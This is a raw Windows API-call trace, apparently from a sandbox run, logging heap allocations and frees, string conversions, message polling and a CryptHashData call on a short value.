[0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d68 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0184.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0184.292] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0184.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d98 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0184.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.296] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0184.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50bd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0184.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.300] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.300] CryptHashData (hHash=0xa875d0, pbData=0x2e54f08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.302] 